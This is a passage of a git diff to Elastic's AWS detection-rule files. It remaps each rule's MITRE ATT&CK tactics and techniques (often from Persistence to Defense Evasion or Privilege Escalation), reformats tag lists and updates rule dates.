Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -99,30 +90,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml index 3e29917bfd5..884d6a0a35b 100644 --- a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml +++ b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -91,15 +91,7 @@ references = [ risk_score = 21 rule_id = "e7cd5982-17c8-4959-874c-633acde7d426" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -136,11 +128,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml index fd04f7d979e..239f05267be 100644 --- a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml +++ b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -71,16 +71,7 @@ references = ["https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-securi risk_score = 21 rule_id = "29052c19-ff3e-42fd-8363-7be14d7c5469" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Resources: Investigation Guide", - "Tactic: Persistence", - "Tactic: Defense Evasion" -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -117,25 +108,17 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml index dde1ff0a43d..7e081c3c90a 100644 --- a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml +++ b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,17 +107,7 @@ references = ["https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/"] risk_score = 21 rule_id = "c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudTrail", - "Data Source: AWS IAM", - "Data Source: AWS STS", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Data Source: AWS STS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -135,17 +125,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml index 829f6ade70b..6e4d05f7250 100644 --- a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml +++ b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -143,24 +143,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/aws/persistence_iam_group_creation.toml b/rules/integrations/aws/persistence_iam_group_creation.toml index 1eb39e9cb91..900293ee8de 100644 --- a/rules/integrations/aws/persistence_iam_group_creation.toml +++ b/rules/integrations/aws/persistence_iam_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,22 +98,16 @@ event.dataset: aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml index 16c89c35694..6fde2381297 100644 --- a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,15 +98,7 @@ references = [ risk_score = 47 rule_id = "47403d72-3ee2-4752-a676-19dc8ff2b9d6" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -120,39 +112,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml index cc0704696b8..4e17091a11c 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -115,15 +115,7 @@ references = [ risk_score = 21 rule_id = "1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -137,22 +129,39 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml index 61a70e9d11f..3b4349b0ddf 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -129,22 +129,21 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_saml_provider_created.toml b/rules/integrations/aws/persistence_iam_saml_provider_created.toml index 4cf0be3208c..4a5c55f92b2 100644 --- a/rules/integrations/aws/persistence_iam_saml_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_saml_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,15 +94,7 @@ references = [ risk_score = 47 rule_id = "a80ffc40-a256-475a-a86a-74361930cdb1" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -116,39 +108,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml index 0e89738a87d..1f7a7230315 100644 --- a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml +++ b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,15 +89,7 @@ references = [ risk_score = 47 rule_id = "151d8f72-0747-11ef-a0c2-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Lambda", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -113,17 +105,21 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml index 941d53cbad3..215103ed6fa 100644 --- a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml +++ b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/27" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,17 +111,7 @@ references = [ risk_score = 47 rule_id = "f2015527-7c46-4bb9-80db-051657ddfb69" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Resources: Investigation Guide", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"] timestamp_override = "event.ingested" type = "eql" @@ -136,36 +126,29 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml index cac81e06dff..d21a1075755 100644 --- a/rules/integrations/aws/persistence_rds_instance_made_public.toml +++ b/rules/integrations/aws/persistence_rds_instance_made_public.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -144,29 +144,29 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.009" -name = "Conditional Access Policies" -reference = "https://attack.mitre.org/techniques/T1556/009/" +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml index 7fefa1edaae..b06ff83c72e 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -104,16 +104,7 @@ references = [ risk_score = 73 rule_id = "12051077-0124-4394-9522-8f4f4db1d674" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Route 53", - "Use Case: Asset Visibility", - "Tactic: Persistence", - "Tactic: Resource Development", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -127,34 +118,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" + [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml index cabac631f4d..fe3fe241355 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -104,16 +104,7 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Opera risk_score = 73 rule_id = "2045567e-b0af-444a-8c0b-0b6e2dae9e13" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Route 53", - "Use Case: Asset Visibility", - "Tactic: Persistence", - "Tactic: Resource Development", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -127,34 +118,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" + [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml index 6a09be1c590..3b9bf00653d 100644 --- a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml +++ b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Austin Songer", "Elastic"] @@ -102,16 +102,7 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Assoc risk_score = 47 rule_id = "e3c27562-709a-42bd-82f2-3ed926cced19" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Route 53", - "Use Case: Asset Visibility", - "Tactic: Persistence", - "Tactic: Resource Development", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -125,34 +116,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1583" -name = "Acquire Infrastructure" -reference = "https://attack.mitre.org/techniques/T1583/" -[[rule.threat.technique.subtechnique]] -id = "T1583.001" -name = "Domains" -reference = "https://attack.mitre.org/techniques/T1583/001/" - +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml index fe48343e5ba..1d7f572fb57 100644 --- a/rules/integrations/aws/persistence_route_table_created.toml +++ b/rules/integrations/aws/persistence_route_table_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -64,15 +64,7 @@ references = [ risk_score = 21 rule_id = "e12c0318-99b1-44f2-830c-3a38a43207ca" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -106,11 +98,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" 